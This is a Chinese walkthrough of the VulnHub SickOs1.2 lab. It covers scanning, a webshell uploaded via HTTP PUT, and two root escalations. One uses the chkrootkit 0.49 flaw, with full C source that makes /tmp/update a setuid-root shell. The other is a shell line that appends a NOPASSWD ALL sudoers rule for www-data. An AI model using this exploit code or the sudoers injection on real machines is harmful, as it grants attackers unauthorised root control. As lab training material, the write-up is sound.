vulnhub-SickOs1.2

攻击机:kali(111.111.111.129),windows(192.168.1.3)

靶机地址:111.111.111.140

信息收集:

使用nmap:端口扫描,服务发现
在这里插入图片描述
使用dirmap:目录扫描
在这里插入图片描述
发现一个test目录,里面可以访问文件。
在这里插入图片描述

漏洞利用

使用burp抓包,测试支持的传输协议,发现可以上传文件
在这里插入图片描述
使用PUT协议上传一个木马
在这里插入图片描述
使用天蝎连接
在这里插入图片描述

权限提升

在天蝎上进行提权操作,当前为web-data
在这里插入图片描述

提权姿势1

chkrootkit提权
chkrootkit是一个后门木马检查工具,Chkrootkit0.49以及以下版本均存在本地提权漏洞,只要提权上传一个文件到tmp目录,管理员再次运行Chkrootkit后,即可获取root权限。
使用kali搜索该漏洞,发现可以使用msf进行操作,也可以在本地操作。
在这里插入图片描述
既然已经拿到webshell,获取meterpeter也是很简单的,这里不详细说明。
直接上手
在这里插入图片描述
在这里插入图片描述

再复现一下本地的,创建c语言脚本

#include <unistd.h>
void main(void)
{
system("chown root:root /tmp/update");
system("chmod 4755 /tmp/update");
setuid(0);
setgid(0);
execl("/bin/sh","sh",NULL);
}

将 /tmp/update 文件的所有者和所属组都更改为 root。这意味着 /tmp/update 文件将由 root 用户和 root 组所有。
chmod 4755 /tmpupdate,这样可以设置文件的权限。4755 是一个八进制的文件权限掩码,设置后,文件将具有以下权限:

4 (Setuid):如果此文件是一个可执行文件,那么用户执行此文件时,将获得文件所有者的权限。
7 (rwx) 对应所有者:读、写、执行权限。
5 (r-x) 对应组和其他用户:读和执行权限。
这将允许任何用户执行 /tmpupdate 文件时以 root 权限运行。

编译在这里插入图片描述
到tmp目录执行./update可以直接获取root权
在这里插入图片描述

提权姿势二

写入sudo权限提权

将www-data用户写入到管理员组sudoers

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

给update赋权

chmod +x /tmp/update

查看权限执行sudo
sudo su ----成功获得root权限

本文参考https://www.freebuf.com/vuls/354371.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Luther@ping

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值